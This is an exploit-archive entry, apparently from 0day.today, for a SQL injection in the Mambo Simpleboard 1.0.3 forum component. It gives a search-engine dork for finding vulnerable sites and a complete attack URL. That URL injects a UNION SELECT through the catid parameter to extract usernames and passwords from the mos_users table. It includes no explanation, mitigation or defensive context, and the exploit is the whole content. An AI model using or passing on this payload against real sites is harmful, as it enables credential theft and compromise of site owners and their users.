id: 2700
date: 02/27/2008
title: Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability
author: 0day Today Team
cves: 

=====================================================================
Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability
=====================================================================



#########################################################
##
##  Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)
##
#########################################################
##
## Dork: inurl:"index.php?option=com_simpleboard"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*






#  0day.today [2023-03-26]  #